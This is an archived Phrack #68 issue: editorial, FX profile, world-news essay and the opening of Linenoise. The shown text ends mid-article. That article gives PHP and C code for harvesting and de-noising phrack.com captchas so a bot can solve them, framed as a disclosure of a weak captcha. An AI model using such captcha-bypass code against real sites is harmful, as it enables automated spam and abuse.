Phrack #68

EDB-ID: 42879
CVE: N/A
Author: phrack
Type: papers
Platform: Magazine
Published: 2012-04-14

                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x01 of 0x13

|=-----------------------------------------------------------------------=|
|=-------------------------=[ Introduction ]=----------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------=[ by the Phrack staff ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  April 14, 2012  ]=-------------------------=|
|=-----------------------------------------------------------------------=|


              "C is quirky, flawed, and an enormous success."
                                   -- Dennis Ritchie

October 2011, a legend has fallen...

                         _____.______.______._____
                         \`\                   /'/
                          \ |                 | /
                           >|___,____,____,___|<
                          /d$$$P ,ssssssssssss. \
                         /d$$$P ,d$$$$$$$$$$$$$b \
                        <=====w======w======w=====>
                         \ \____> \_____/ <____/ /
                          \_____________________/ pb


Dennis Ritchie, proud father of nothing less than our beloved C language
and UNIX operating system, is gone. While the world has been crying over
the loss of Steve Jobs, little has been written about Dennis' death. Saying
that his inventions influenced the hacking community in a way even he
probably never knew is _not_ an exaggeration. Think about it: how many of
us became hackers because we discovered C, related bugs or UNIX?

Dennis, the world might not be aware of your unbelievable contribution but
we are. Farewell dear friend, may you rest in peace.

                                        -- anonymous bug hunter


                        -----( Dark Thoughts )-----

Today I woke up thinking about the death of this Chinese little girl [1]. I
felt bad. It's true that watching the youtube video was disturbing but
something kept hitting my mind. What if the incident had occurred in my
country?  Would people really have behaved any differently? I have doubts.
Just because a video leaked on the Internet people conveniently blamed
China, a country both controverted and feared.

What if the modern society in general was tending to slowly become amoral
and cold? A proof is that we all watched this video fully aware of its
content. Vicious, aren't we? But not only that. We're also fucking cowards.
Suddenly discovering that there is a darkness hidden inside the very roots
of our society is dramatic. But pretending to ignore the fact that there
are countries in this world where atrocious massacres are part of the daily
life seems fine.

It was written in the US Declaration of Independence that "We hold these
truths to be self-evident, that all men are created equal [...]". How could
that possibly be true? This morning I was at home, healthy, comfortably
sitting in front of my computer screen, with a cup of coffee in hand. A few
minutes later, I was working (or luxuriously pretending to be) to earn
money that I spent in the bar that night with my friends. In the mean time,
not so far away, people were killed, raped, mutilated. The truth is that I
don't even care when I think about it. This morning I was pretending to be
concerned for other people, but tonight I don't give a shit anymore.

Something must be wrong.

                                    -- anonymous coward / Phrack


[1] http://www.chinapost.com.tw/china/national-news/2011/10/21/320549/
    Chinese-girl.htm


                      -----( Phrack Issue #68 )-----

Hello Phrackers! How are you guys doing? We hope well. We hope your latest
exploit works reliably (again) and all your bounces are alive and pinging.
We also hope you and your friends still are out of prison, or recently came
out (wink wink). Us, we're doing good. Looks like we did it again and a new
release is here. Ya-hoo.

This release brings you an amazing selection of hacking goodies. We have
two papers on applied cryptanalysis by greg and SysK, an area in which we
hope to see more submissions for the next issues. We are also thrilled
about the return of the Art of Exploitation section. And what a return; we
have for you not one, but two detailed papers demonstrating that
exploitation is indeed an art form. Speaking of exploitation, did you ever
wonder what Firefox, FreeBSD and NetBSD have in common? Read the paper by
argp & huku and find out. Are you hacking Windows' farms? Be sure to check
the p1ckp0ck3t's novel approach of stealing Active Directory password
hashes. Perhaps you prefer malware analysis and identification of malware
families; Pouik and G0rfi3ld have written a paper with a focus on Android
malware that will satisfy you. Android is quickly becoming the standard
mobile platform. I think it's time for an Android/ARM kernel rootkit. Start
from dong-hoon you's paper and hack your own. styx^ continues the kernel
fun with a paper that updates truff's LKM infection techniques to 2.6.x and
3.x Linux kernels. If for whatever reason you're afraid of messing with
your kernels, Crossbower shows you how to create a stealthy userland
backdoor without creating new processes or threads.

We also believe that you will find merit with the two main non technical
papers of this issue. Both address more or less the same topics, but from
two totally different points of view. On one hand, we have an analysis of
how the happiness that hacking brings to all of us can and is corrupted by
the security industry. On the other, a call to all hackers to take a side
between staying true to the spirit of hacking and selling out to the
military intelligence industrial complex. Read them, think about them and
take a side. Remember, "The hottest places in hell are reserved for those
who in times of great moral crisis maintain their neutrality".

Phrack World News is also making a comeback, courtesy of TCLH. In
International Scenes we explore Korea and the past of the Greek scene.
Loopback has increased and we decided to resurrect Linenoise as we had some
tiny but not less interesting submissions. While being eligible for an
issue remains hard, submitting for Linenoise may be an easier way for
people to share tricks in the next issues.

We are proud to have FX prophiled in this epic issue. As an added gift, FX
wrote a eulogy for PH-Neutral, at least in its original form. PH-Neutral,
as all great hacker creations, lives on as long as the hackers behind it
are fueling it with their passion.

Speaking of hacker passion, this issue re-establishes a long lost
connection. Phrack and SummerCon are again bonded on the 25th anniversary
of SummerCon! Shmeck and redpantz, representing SummerCon, contribute two
papers; a history of the conference from its beginning in 1987 to this
year, and of course one of the Art of Exploitation papers.

Believe it or not it was _fucking_ hard to prepare this issue. It's no news
that the mentality of the hacking community has changed, but this time we
had to face multiple deceptions. It's not the first time, however the 
quantity makes this event scary. It demonstrates how rotten and corrupted 
the so-called spirit of some people pretending to be part of the 
underground has become.

There's a time when you realize that you've lost count of the battles you
lost, but you still kinda won enough to keep faith. More importantly, you
realize that you still care. Granted, it's not the deep, mystical and life
changing moment that movies display -- the huge pile of shit you pushed out
of the door just before getting to sleep is still there. It maybe just
stinks a little less.

But we care, hell, we really care about Phrack and what it means. It costs
time and frustration, many battles lost, it faces the two-point-oh
revolution (lots of quality stuff goes into blogs, for immediate
consumption) and the money drop by the security industry, but the
satisfaction of seeing it out again is huge. Yes, we care.

And that's not just because we're a bunch of old farts that stay attached
to the past. We care because it's a constant, maybe feeble but constant,
heartbeat of that world, that community that we grew up and now live in.
You know, that little thing called 'the Underground' that we are proud and
honored to somehow, in part, represent.

We've heard from many corners that 'the Underground' is dead. We'd love to
hear those people describe what the Underground is, then. Sure, things
change, evolve. Laws, computing power, money invested, political links,
technology, every piece moves fast and reshapes the landscape. But if
you're reading these lines today, if you've just finished a 36-hour
coding, hacking marathon, you're keeping it alive.

So thank you, for that. Thank you to the authors for finding the time of
sharing their knowledge. Thank you to anyone that sets up a new connection.
Thank you to whomever fights for information and freedom. Thanks crews.

Happy hacking, Phrackers.
You guys are the BEST heartbeat in the world.


                                    -- the Phrack staff


 ______  _     _ ______          ______ _    _      __  _      __   _____
(_____ \| |   | (_____ \   /\   / _____) |  / )   _|  || |_   / /  / ___ \
 _____) ) |__ | |_____) ) /  \ | /     | | / /   (_   ||  _) / /_ ( (   ) )
|  ____/|  __)| (_____ ( / /\ \| |     | |< <     _|  || |_ / __ \ > > < <
| |     | |   | |     | | |__| | \_____| | \ \   (_   ||  _| (__) | (___) )
|_|     |_|   |_|     |_|______|\______)_|  \_)    |__||_|  \____/ \_____/


                 - By the community, for the community. -


$ cat p68/index.txt

<--------------------------( Table of Contents )-------------------------->

 0x01  Introduction ...................................... Phrack Staff

 0x02  Phrack Prophile on FX ............................. Phrack Staff

 0x03  Phrack World News ................................. TCLH

 0x04  Linenoise ......................................... various

 0x05  Loopback .......................................... Phrack Staff

 0x06  Android Linux Kernel Rootkit ...................... dong-hoon you

 0x07  Happy Hacking ..................................... Anonymous

 0x08  Practical cracking of white-box implementations ... SysK

 0x09  Single Process Parasite ........................... Crossbower

 0x0a  Pseudomonarchia jemallocum ........................ argp & huku

 0x0b  Infecting loadable kernel modules ................. styx^

 0x0c  The Art of Exploitation:
       MS IIS 7.5 Remote Heap Overflow ................... redpantz

 0x0d  The Art of Exploitation:
       Exploiting VLC, a jemalloc case study ............. huku & argp

 0x0e  Secure Function Evaluation vs. Deniability in OTR
       and similar protocols ............................. greg

 0x0f  Similarities for Fun and Profit ................... Pouik & G0rfi3ld

 0x10  Lines in the Sand: Which Side Are You On in the
       Hacker Class War .................................. Anonymous

 0x11  Abusing Netlogon to steal an Active Directory's
       secrets ........................................... the p1ckp0ck3t
 
 0x12  25 Years of SummerCon ............................. Shmeck

 0x13  International Scenes .............................. various

<------------------------------------------------------------------------->


                    -----( GreetZ for issue #68 )-----

    - FX:                            epicness personified
    - herm1t:                        you have our support
    - TCLH:                          for everything
    - x82:                           deepest apologies for the 1 year wait
    - anonymous authors:             best part of this issue
    - sysk:                          keep submitting man!
    - redpantz & Shmeck:             Phrack and SummerCon bonded again
    - greg:                          schooling Alice and Bob
    - Crossbower:                    parasite zoologist
    - the p1ckp0ck3t:                be wary or he will get your hashes
    - huku & argp:                   the scourge of memory allocators
    - styx^:                         yes we are hardcore reviewers
    - Pouik & G0rfi3ld:              who the hell is G0rfi3ld??? ;>
    - scene phile writers:           you have big balls guyz
    - linenoise writers:             Eva you're soooooooo cute :3
    - our generous hoster:           a contribution not forgotten ;)
    - z4ppy, ender:                  external reviews are paid in beers
    - b3n:                           too bad we didn't use your stuff
    - No greetz, no thankz to:       you know who you are :<

       And of course many thanks to the loopback contributors :')


                  -----( Phrack Magazine's policy )-----

phrack:~# head -n 22 /usr/include/std-disclaimer.h
/*
 *  All information in Phrack Magazine is, to the best of the ability of
 *  the editors and contributors, truthful and accurate.  When possible,
 *  all facts are checked, all code is compiled.  However, we are not
 *  omniscient (hell, we don't even get paid).  It is entirely possible
 *  something contained within this publication is incorrect in some way.
 *  If this is the case, please drop us some email so that we can correct
 *  it in a future issue.
 *
 *
 *  Also, keep in mind that Phrack Magazine accepts no responsibility for
 *  the entirely stupid (or illegal) things people may do with the
 *  information contained herein.  Phrack is a compendium of knowledge,
 *  wisdom, wit, and sass.  We neither advocate, condone nor participate
 *  in any sort of illicit behavior.  But we will sit back and watch.
 *
 *
 *  Lastly, it bears mentioning that the opinions that may be expressed in
 *  the articles of Phrack Magazine are intellectual property of their
 *  authors.
 *  These opinions do not necessarily represent those of the Phrack Staff.
 */

                  -----( Contact Phrack Magazine )-----


            <  Editors           : staff[at]phrack{dot}org   >
            >  Submissions       : staff[at]phrack{dot}org   <
            <  Commentary        : loopback[@]phrack{dot}org >
            >  Phrack World News : pwned[at]phrack{dot}org   <


    Submissions may be encrypted with the following PGP key:
    (Hint: Always use the PGP key from the latest issue)



                            -----( EOF )-----


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x02 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[ PHRACK PROPHILE ON ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  FX of Phenoelit   ]=-----------------------=|
|=-----------------------------------------------------------------------=|

|=---=[ Specifications

           Handle: FX
              AKA: 41414141
    Handle origin: First and last letter of my first name
                   (I had no idea it had a meaning in movie production)
      Produced in: East Germany
             Urlz: http://www.phenoelit.de/
        Computers: Metric tons of them
       Creator of: much crappy and useless code
        Member of: Phenoelit, Toolcrypt
         Projects: PH-Neutral, Phonoelit
            Codez: IRPAS (bunch of tools that somehow still cause havoc)
                   cd00r.c (later called PortKnocking by the copycats)
                   works-on-my-machine exploits
     Active since: late 80s
   Inactive since: unlikely to happen

|=---=[ Favorites

          Actors: don't care
           Films: Hackers (1995) - imagine it actually would be like that
         Authors: Neal Stephenson, Iain M. Banks, Frank & Brian Herbert
        Meetings: Bars
             Sex: ACK
           Books: Computer Security, Time-Life Books (1986), and it began
           Novel: too many to list
           Music: Progressive House Kitsch
         Alcohol: Oh Yes!
            Cars: Mercedes-Benz
           Girls: SYN
           Foods: German
          I like: honesty, pragmatism, realism, tolerance, style, empathy
       I dislike: fakes, aggression, ignorance, senselessness, deception

|=---=[ Describe your life in 3 sentences

Every work day is packed with challenges, great hacks and awesome people.
Every free day compensates with non-security hobbies and sleep.
This sentence is padding.

|=---=[ First contact with computers

At the age of 6 at the computing department of the university of Sofia,
Bulgaria. Didn't leave much of an impression, as I was only allowed to play
a silly game (in CGA color).

Second contact happened at the age of 9 or 10, a Robotron Z9001. It came
without software but with a typewriter made programming manual for BASIC.
I read it cover to cover.

|=---=[ Passions: What makes you tick

Like-minded people: Conversations give me the greatest boost. Let me 
explain something to a person who gets it, and I will have a new idea how
to take it further.

Also, work. That state of a problem where it is no longer fun, but actual
work, to get it where you want it. Not letting go. Stubbornness compensates
for a lot of talent.

|=---=[ Unix or Windows? Juniper or Cisco?

Unix and Windows. I like both, I use both, they both suck in their own
ways. The only thing you will not see me with is anything Apple.

Juniper, Cisco, all networking equipment is broken, Cisco being in the
lead. How can you sell equipment that is in most cases simply forwarding
IPv4 packets from interface 1 to interface 2 since 1987 and still crash on
parsing IPv4 in 2011?

|=---=[ Color of hat?

undef($hat);

|=---=[ Entrance in the underground

First contact must have been around 1990. Shortly after the Berlin wall
came down, I got my first 80286 machine and hung out at a computer club in
a Thaelmann Pioneers' (youth organization of schoolchildren in East
Germany) youth center. In a back room, two older guys downloaded infrared
images from Russian satellites. While the download ran, they cracked PC
games for the kids to pass the time. First time I saw a hex dump.

I had the great honor to meet many people that I consider(ed) part of the
real underground. Some of them still are. But I don't think I was ever part
of that myself.

|=---=[ Which research have you done or which one gave you the most fun?

Anything I did was fun at the time, why doing it otherwise? I generally
like fiddling around with Bits and bytes more than hunting bugs in large
environments. Writing disassemblers, debuggers and the like is a pleasure.
It's also monkey work. But it lets you feel so much about the history and
design of a platform.

I also like network protocols, because you can often see the vulnerability
potential by reading the specifications already. Protocols are interfaces
and interfaces are where the bugs live. Also, logging functions love to use
packet contents and fixed buffers.

|=---=[ Personal general opinion about the underground

Much. Fucking. Respect.

Seriously, what is published is only the tip of an iceberg. Once you talk
to people, it's simply insane how much knowledge there is. Interestingly,
I have the impression that little of this knowledge is ever used.

One aspect often considered essential in the underground I dislike:
Owning people fails to impress me. It's like beating people up, everyone
can do that and none of it makes it an achievement. If you found that
vulnerability yourself and made a custom exploit, that's an achievement.

|=---=[ Personal general opinion about the German underground

Regardless of the definition of underground, the hacking scene in Germany
is very alive and diverse. However, I would love to see more of them
write exploits.

|=---=[ Personal general opinion about the European underground

The U.S. is much more visible, but Old Europe kicks their ass any time.
Just looking at the French scene is scary. If only they would speak
English ;) And don't even get me started on east Europe and Russia.

|=---=[ Memorable experiences/hacks

- Finding my first overflow in Cisco IOS TFTP, resisting the urge to post
  it immediately and deciding to write an exploit. Then realizing how much
  of a journey lay ahead of me, since I had never written any exploit
  before.

- Writing an exploit that needed to be stable, i.e. work in the wild. After
  weeks of frustration finally understanding that PoC is only 10% of
  exploit development. Halvar saving my ass again with a simple hint.

- Being asked by my employer to take the CISSP exam, being initially
  rejected due to my "connections to hackers" as a DEFCON speaker, being
  allowed to take the exam and finding a 12 octet MAC address in a
  question. Finding out afterwards that (ISC)2 probably has more admin
  users on their web servers than paying members.

- Asking someone to look at Cisco IOS exploitation after I spent about
  a decade with it and getting my ass kicked in less than a week. True
  talent trumps everything.

- Caesar's Challenge over the years: hearing about it, being invited in,
  being told by Caesar that he accepts my solution, welcoming Caesar to
  PH-Neutral.

- Being invited to train a team of hackers and later finding out that
  the whole purpose of the exercise was to cure them from their respect
  for me. And it worked.

- The nights in Wuxi (China) with the Wuxi Pwnage Team.

|=---=[ Memorable people you have met

- Halvar Flake
  I have to thank this man for a lot of things in my life.

- Sergey Bratus
  A great man with a great vision. He changed how I look at academia and
  hacking. With people like Sergey, there is hope.

- John Lambert
  One of the smartest men I've ever met. Just in case you wonder why
  Windows exploitation is so challenging today.

- Dan Kaminsky
  Dan and I share a passion for protocols. We first met in 2002, about five
  times, at cons all over the planet, and talked IP(v4). Good times.

- ADM, that one summer

|=---=[ Memorable places you have been to

- Idaho Falls

|=---=[ Disappointing people you have met

Many manufactured or self-styled experts giving presentations at
conferences. If you didn't write or at least read the code in question,
shut up. The number of charlatans is unfortunately growing steadily.
Some would probably count me in that category as well.

Also, friends that betray the very people that trust them most.

|=---=[ Who came up with the name "Phenoelit" and what does it mean?

Nothing to see here, move on.

|=---=[ Who are you guys?

Just friends.

|=---=[ Who designed those awesome Phenoelit t-shirts?

I always did the designs for Phenoelit and PH-Neutral. I greatly enjoy
doing them. For PH-Neutral, the process was that I had to come up with a
motive and would do all the work, Mumpi watching me, drinking beer and
complaining. It would not have worked any other way.

|=---=[ Phenoelit vs 7350 vs THC?

We met 7350 and THC first time at the 17c3 and became friends with several
of them over time. I sincerely miss 7350, but their time had come.

|=---=[ Things you are proud of

The team I am blessed to work with.

|=---=[ Things you are not proud of

- Writing shitty exploits
- Having a pretty good hand at picking research topics that are not
  relevant to the real world
- Being strictly single-tasking

|=---=[ Most impressive hackers

- Dvorak
- Halvar Flake
- Philippe Biondi
- Ilja van Sprundel
- Anonpoet
- Greg
- Last Stage of Delirium

This list is biased by me not knowing many of the really impressive
hackers.

|=---=[ Opinion about security conferences

Security conferences have been essential for my personal development and I
still love to go to them. I have a preference for smaller cons, since it is
more likely to get to talk to people.
Almost any talk has something for me to take away. But more important is
the hallway track and going out with fellow hackers.

The distinction between hacker cons and corporate or product security
conferences used to be clear. It is no longer, which is sad.

|=---=[ Opinion on Phrack Magazine

IMHO one of the most well regarded e-zines in the world, influencing much
research over the time of its existence. Just look at how many academic
publications cite Phrack articles. Keep it up!

|=---=[ What you would like to see published in Phrack?

I think Phrack does just fine. For me, exploitation techniques are at
the heart of Phrack. I also enjoy reading about environments that not
many people have access to: control systems of all kinds, for example.

Maybe you should aim for more timely releases though.

|=---=[ Personal advices for the next generation

That implies that I'm old and expired, right?

The one advice I would give is: Don't care about the opinion of others when
it comes to research. It doesn't matter if they think it's cool, you must
think it's cool. Look for and credit prior art, build on what is there
already and have fun doing so.

And if you really have to use Python, understand that error handling is not
the same thing as stack traces. Catch your exceptions and handle them, or
at least display something useful.

|=---=[ Your opinion about the future of the underground

Predictions are hard, especially when they concern the future.

|=---=[ Shoutouts to specific (group of) peoples

To the hacker and vx groups of the 80s and 90s, who built the foundation
of everything we still concern ourselves with today.

|=---=[ Flames to specific (group of) peoples

To the snake-oil security product vendors, who refuse to innovate and bind
available talent in signature writing sweat jobs, because that model pays
them so well. Your "protections" add vulnerabilities to every aspect of
modern networks, and you know it. The halting problem is UNDECIDABLE!

|=---=[ Quotes

"Does it just look nice or is it correct?"
- zynamics developer about a control flow graph

"Nine out of the ten voices in my head say I'm not schizophrenic. The
other one hums the melody of Tetris."

|=---=[ Anything more you want to say

I would like to thank the Phrack staff for this honor, although I'm still
convinced there are 0x100 people who deserved it more.

                  |=---=[ A eulogy for PH-Neutral ]=---=|

We created PH-Neutral in 0x7d3 as an attempt to bring together the people
we respected most. We were simply unaware of the other small events that
already existed. The intention was to have an informal meeting with ad-hoc
workshops and a great party. We failed at the party, despite a full-blown
dance floor. However, the people actually worked together and discussed
their projects and exploits. We were sending out the invitations
individually by email and I was surprised about the many positive
reactions. We would not have thought that so many well-known and
interesting people would actually show up.

Over the years, the event grew. Although we kept it invite-only, the
mechanism for invitations had to consider people that were there in the
past as well as fresh blood. Therefore, one way or another, it had a snow
ball effect to it. But in the early years, this was a good thing. There
was an astonishing amount of innovation going on during the first five
years. We never expected to see people actually working together. It was
the time of sharing code and knowledge, of searching for JTAG on a dance
floor and of the Vista ASLR release.

The bigger the event got, the more the focus shifted from hacking to party.
Since that corresponded with our second initial goal, we did encourage it.
We really like to party with our friends, and by party we mean actual
dancing and not just standing around and getting drunk. It was amazing
to see how well the party developed over the years. Despite the growth,
it still had a very intimate feeling.

Initially meant as a joke during setup of the second PH-Neutral, we had
decided to not have it run forever. For one, we didn't want to see it going
down and fading away. When more and more conferences started to show up on
the map, it only encouraged us to conclude the story of PH-Neutral. It had
its time and place.

The last PH-Neutral 0x7db then proved that the decision was right. It was
that little bit of too many people that turns a large group of
international friends into a somewhat anonymous crowd. Although luckily
not many guests noticed, it changed the way we had to run the event
completely. Where in the years before, we could hack and party with our
friends, we had to fire-fight, manage and regulate. That was not the way it
was meant to be for us, so it was a good time to call it quits.

PH-Neutral was made into what it was by the people that participated, more
so than any other event I know. The people decided on the spin of each
year's event by how they filled the frame we gave them. It was their
party and they took it and made it great. Thank you forever!

[ EOF ]


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x03 of 0x13

|=-----------------------------------------------------------------------=|
|=------------------------=[ Phrack World News ]=------------------------=|
|=-----------------------------------------------------------------------=|
|=----------------------------=[ by TCLH ]=------------------------------=|
|=-----------------------------------------------------------------------=|

It has been a while since the last Phrack World News, and much has happened
in our world since then. Governments have been overthrown [1], human rights
partially restored in one country, and taken away in the next [2]. The
so-called first world has been bought, delivers monitoring and suppression
equipment to totalitarian countries [3] as well as making its use a legal
requirement in their own [4]. The content mafia, considering every form of
creative and work output their property, has declared war on all internet
citizens. No matter if picture, song, movie or academic paper, you shall pay
for its consumption or be banned from the net [5]. That they are actually
trying to resist evolution [6] is of no concern to them.

In times like that, where your network traffic may go through more deep
packet inspection engines than observable hops in traceroute, the hacker
shall reconsider his ways of communication. It is no longer enough to
SSH/VPN into one of your boxes and jump into your screen sessions, as the
communication of that box is monitored as much as your home network
connection.

Global surveillance is no longer stuff from science fiction books, or
attributed only to the most powerful secret services in the world. It
becomes a requirement for most ISPs to stay in business. They can either
sell you, or they can sell their company, and you can bet that the latter is
not an option they consider.

Besides, traffic patterns of the average internet user change. We are
approaching a time when the ordinary user will only emit HTTP traffic with
his daily activities, making it easy for anyone interested to single out
the more creative minds, just by the fact that they still use protocols
like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to
us to come up with new and creative ways of using this internet before
packets get dropped based on their protocol characteristics and we find
ourselves limited to Google+ and Facebook.

At the same time, the additional protections we have come to rely on prove
to be as bad as we always thought they might be. When breaking into a
certificate authority is as easy as it was with DigiNotar [7], when the
database of Comodo [8] ends up in BitTorrents, we are facing bigger
challenges than ever before. There are various discussions all over the net
on how to deal with the mess that is our common PKI.  From the IETF [9] to
nation states, everyone has their own ideas. When certificate authorities
are taken over by governments or forced to issue Sub-CA certificates to the
same [10], it's not a trust mechanism we shall rely on.

An attitude that this is someone else's problem doesn't help. As more and
more functions of daily life move online, everyone is exposed to these
problems. Even if you know how to spot certificate changes, you will still
need to access the web site. HTTPS doesn't provide a plan B option. The CA
nightmare calls for the gifted and smart people to work together and find a
long term dependable solution. This is the time where your talent, skills
and experience are required, unless you are fine with government and vendor
driven committees to "solve" it.

Meanwhile over at IRC's little pre-teen sister Twitter, whose attention
span is shorter than that of a fruit fly and easily bought, people hype
so-called solutions [11] to the problem without doubts.  Although their
heroes abandon privacy solutions people depend on the moment someone waves a
little money in their face [12], the masses rather believe in a savior than
to think and evaluate for themselves.  Are you one of them?

Unquestioned belief becomes the new normal. Whether it is Google or Apple
fanboyism, the companies can do whatever they want. Apple ships products
with several year old vulnerabilities [13] in open source components they
reused and nobody notices. Everyone can make X.509 certificates that iPhone
and iPad will happily accept [14]? No problem.  Think back and consider the
shit storm if that would have been Microsoft. These companies feel so
invincible that Apple's App Store Guidelines [15] openly state: "If you run
to the press and trash us, it never helps."
Critical thinking seems to become a challenge when you get what you want.
Just look at how many hackers use Gmail without any end-to-end encryption,
because it just works. Which hacker using a hotmail email address was ever
taken seriously? Where is the difference?

What Apple and Google are for the hip generation, Symantec is for
governments and corporations. They are seen as the one company that will
protect us all. When the source code of PCAnywhere is leaked [16] and the
same company simply advises its users to no longer use that software
product [16], you get an idea of how they evaluate the security of it
themselves. And what about all the systems in daily life that depend on it?
If nobody used PCAnywhere, Symantec would have stopped selling it long ago.
Therefore, they simply left a large user base out in the cold.  And what
happens? Nothing. Except, maybe, that some have fun with various remote
access points.

It all comes down to knowledge. Knowledge cannot be obtained by belief.
Belief is a really bad substitute for actually knowing. And what is the
hacker community other than first and foremost the quest for knowledge that
you found out yourself by critically questioning everything put in front of
you. What you do with that knowledge is a question everyone has to answer
himself. But if we stop to learn, experiment and play, we stop being
hackers and become part of the masses. It is a sign of the times when only
very few hackers speak IPv6, let alone use it. When you see more fuzzers
written than lines of code actually read, because coding up a simple
trash-generator is so much easier than actually understanding what the code
does and then precisely exploiting it.

The quest for knowledge defines us, not money or fame. Let's keep it up!


[1] https://en.wikipedia.org/wiki/Arab_spring
[2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising
[3] http://buggedplanet.info/index.php?title=EG
[4] https://en.wikipedia.org/wiki/Telecommunications_data_retention
[5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29
[6] http://www.wired.com/threatlevel/2012/02/peter-sunde/
[7] https://en.wikipedia.org/wiki/DigiNotar
[8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security
[9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html
[10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929
[11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29
[12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter
[13] http://support.apple.com/kb/HT5005
[14] http://support.apple.com/kb/HT4824
[15] https://developer.apple.com/appstore/guidelines.html
[16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/
[17] http://www.symantec.com/connect/sites/default/files/pcAnywhere
     %20Security%20Recommendations%20WP_01_23_Final.pdf


[ EOF ]


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13

|=-----------------------------------------------------------------------=|
|=-----------------------=[  L I N E N O I S E  ]=-----------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------------=[     various     ]=-------------------------=|
|=-----------------------------------------------------------------------=|


Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we
had great short and sweet submissions we thought it was about time to
resurrect it. After all, "a strong linenoise is key" ;-)

So, dear hacker, enjoy a strong Linenoise.


--[ Contents

    1 - Spamming PHRACK for fun and profit                 -- darkjoker
    2 - The Dangers of Anonymous Email                     -- DangerMouse
    3 - Captchas Round 2                                   -- PHRACK PHP
                                                              CoderZ Team
    4 - XSS Using NBNS on a Home Router                    -- Simon Weber
    5 - Hacking the Second Life Viewer For Fun and Profit  -- Eva
    6 - How I misunderstood digital radio                  -- M.Laphroaig
    7 - The 1130 Guide to Growing High-Quality Cannabis    -- 1130


|=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=|

In this paper I'd like to explain how a captcha can be bypassed without
problems with just a few lines of C.  First of all we'll pick a captcha to
bypass, and, of course, is there any better captcha than the one of this
site?  Of course not, so we'll take it as example.  You may have noticed
that there are many different spam messages in the comments of the
articles, which means that probably someone else has already bypassed the
captcha but, instead of writing an article about it, decided to spend his
time posting spam all around the site.  Well, I hope that this article will
also be taken into account to make the decision to change captcha, because
this one is really weak.

First of all we're going to download some captchas, so that we'll be able
to teach our bot how to recognise a random captcha.  In order to download
some captchas I've written this PHP code:

<?php
mkdir ("images");
for ($i=0;$i<200;$i++)
   file_put_contents ("images/{$i}.jpg",file_get_contents
                  ("http://www.phrack.com/captcha.php"));
?>

We're downloading 200 captchas, which should be enough.  Ok, once we'll
have downloaded all the images we can proceed, cleaning the images (which
means we're going to remove the "noise").  In these captchas the noise is
just made of some pixels of a lighter blue than the one used to draw the
letters.  Well, it's kind of a mess to work with JPEG images, so we'll
convert all the images to PPM, which will make our work easier.

Luckily under Linux there's a command which makes the conversion really
easy and we won't need to do it manually:

convert -compress None input.jpg output.ppm

Let's do it for every image we have:

<?php
mkdir ("ppm");
for ($i=0;$i<200;$i++)
   system ("convert -compress None images/{$i}.jpg ppm/{$i}.ppm");
?>

Perfect, now we have everything we need to proceed.  Now, as I said
earlier, we have to remove the noise.  Here's a function which will load an
image, so that the noise can then be removed:

void load_image (int v) {
   char img[32],line[1024];
   int n,i,d,k,l,s;
   FILE *fp;
   sprintf (img, "ppm/%d.ppm",v);
   fp = fopen (img, "r");
   do
      fgets (line, sizeof(line),fp);
   while (strcmp (line, "255\n"));
   i=0;
   d=0;
   k=0;
   int cnt=0;
   while (i!=40) {
      fscanf (fp,"%d",&n);
      captcha[i][d][k]=(char)n;
      k++;
      if (k==3) {
         k=0;
         if (d<119)
            d++;
         else {
            i++;
            d=0;
         }
      }
   }
}

Ok, this piece of code will load an image into 'captcha', which is a 3
dimensional array (rows*cols*3 bytes per color).  Once the array is loaded,
using clear_noise () (written below) the noise will be removed.

void clear_noise () {
   int i,d,k,t,ti,td;
   char n[3];
   /* The borders are always white */
   for (i=0;i<40;i++)
      for (k=0;k<3;k++) {
         captcha[i][0][k]=255;
         captcha[i][119][k]=255;
      }
   for (d=0;d<120;d++)
      for (k=0;k<3;k++) {
         captcha[0][d][k]=255;
         captcha[39][d][k]=255;
      }
   /* Starts removing the noise */
   for (i=0;i<40;i++)
      for (d=0;d<120;d++)
         if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
             captcha[i][d][2]>__COL)
            for (k=0;k<3;k++)
               captcha[i][d][k]=255;
   for (i=1;i<39;i++) {
      for (d=1;d<119;d++) {
         for (k=0,t=0;k<3;k++)
            if (captcha[i][d][k]!=255)
               t=1;
         if (t) {
            ti=i-1;
            td=d-1;
            for (k=0,t=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td+=2;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td=d-1;
            ti=i+1;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            td++;
            for (k=0;k<3;k++)
               if (captcha[ti][td][k]!=255)
                  t++;
            if (t<__MIN)
               for (k=0;k<3;k++)
                  captcha[i][d][k]=255;
         }
      }
   }
}

Well, what does this function do? It's really easy, first of all it clears
all the borders (because we know by looking at the downloaded images that
the borders never contain any character).  Once the borders are cleaned,
the second part of the routine will remove all the light blue pixels,
